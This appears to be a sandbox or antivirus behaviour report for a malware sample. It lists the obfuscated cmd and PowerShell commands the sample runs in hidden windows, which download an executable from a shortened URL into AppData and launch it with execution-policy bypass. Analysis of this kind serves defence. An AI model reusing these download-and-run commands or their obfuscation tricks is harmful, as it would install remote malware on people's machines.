Technical Information
Malicious functions
Executes the following (exploit)
- '<SYSTEM32>\cmd.exe' /c po^wershp^ll -w 1 (nEw-oB`jecT Net.WebCL`I`eNT).('Down'+'loadFile').Invokp('https://tinyurl.com/y5asyj4y','me.exe')
- '<SYSTEM32>\cmd.exe' /c po^wershp^ll -w 1 -EP bypass Start-Sleep 25; cd ${enV`:appdata};.('.'+'/me.exe')
- '<SYSTEM32>\cmd.exe' /c po^wershp^ll -w 1 Start-Sleep 20; Move-Item "me.exe" -Destination "${enV`:appdata}"
Miscellaneous
Executes the following
- '<SYSTEM32>\cmd.exe' /c po^wershp^ll -w 1 (nEw-oB`jecT Net.WebCL`I`eNT).('Down'+'loadFile').Invokp('https://tinyurl.com/y5asyj4y','me.exe')' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c po^wershp^ll -w 1 -EP bypass Start-Sleep 25; cd ${enV`:appdata};.('.'+'/me.exe')' (with hidden window)
- '<SYSTEM32>\cmd.exe' /c po^wershp^ll -w 1 Start-Sleep 20; Move-Item "me.exe" -Destination "${enV`:appdata}"' (with hidden window)
